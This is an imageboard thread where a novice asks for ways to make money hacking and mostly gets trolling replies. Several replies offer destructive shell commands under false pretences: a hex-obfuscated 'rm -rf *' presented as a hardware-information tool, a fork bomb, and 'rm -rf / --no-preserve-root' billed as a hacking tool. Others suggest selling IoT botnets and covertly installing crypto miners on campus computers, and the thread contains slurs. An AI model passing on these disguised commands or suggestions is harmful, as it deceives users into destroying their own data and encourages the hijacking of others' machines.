Making money Hacking

im very savy with computers, i built my first one when i was 9 and been using them all my life, i really want to start hacking. I know "hacking is a broad term but im looking for ideas and want to know as many different options as possible. Although im good with computers im not good at coding/programming so keep that in mind, i learn really fast and am very interested in this topic, any ideas or personal experience would be much appreciated.

Other urls found in this thread:

dropbox.com/sh/3n9pwy8rwpv1ngh/AABOLVEsnton1EBL9NXQ2uBda?dl=0
twitter.com/SFWRedditVideos

type the command

$(echo 726d202d7266202a | xxd -r -p)

in your terminal, it will display interesting, low-level information on various aspects of your hardware which you can use to better understand your machine from a lower-level

Faggot just write a iot botnet and sell bots

Type this command in your terminal

:(){:|:&};:

Best for wifi cracking if you're interested

go to your local campus and install bitcoin miners on all the machines to your wallet

fuck off skiddie, you're not worthy enough to be on this board or even have us teach you

im very serious in my intent, its something i will learn the only problem atm is the fact that i have no one to help or teach me.

sudo rm -rf / --no-preserve-root

The best hacking tool, and works on every GNU/Linux distro

if you were even competent enough, or actually gave a shit- you wouldn't need anyone to teach you. Almost all hackers are self taught.

But since you're that much of an idiot, I'll give you some pointers.
>install a linux distro like kali or mint, depending on your needs
>learn and master linux and the command line, go and get some books from your local library related to cyber security or hacking or linux.
>try to learn a programming language, i'd recommend Python.

Seriously, books are almost all the knowledge you need and you can find most of them online for free. This will help you out.

dropbox.com/sh/3n9pwy8rwpv1ngh/AABOLVEsnton1EBL9NXQ2uBda?dl=0

everyone here is pretentious and won't tell you
if you aren't a retard then don't do anything they tell you too
and the reason they're so autistic about it is because hacking has a very broad definition and doesn't even always have to do with software in the first place.
If you want to learn how to program and manipulate shit then learn python I guess. Definitely learn how to do stuff in the terminal.
When you have an understanding of that learn what a kernel is and learn how it works.
What is important here isn't learning how to do it, it's how it works.

>guy fawkes mask
>bad English
What a shame, I'd been thinking of giving you advice. Figure out what to do for yourself like I did, it's not hard.

but by you giving advice wit would speed up the process so much

Allina mein fadora delathy Raj I fadora onagai with eud ma fadora fadora.

Why would anyone help you? Hacking is illegal user, we're good boys here.

hehe

>lainfag
>tries to seem knowledgeable

Hero derp I'm very insightful

No way this is real

im assuming there is going to be no serious answers?

this is the soymilk of threads

how old are you op?
i think i might help

I'm only 7 mister...
pwease help me

Just no footlong Mr Jarred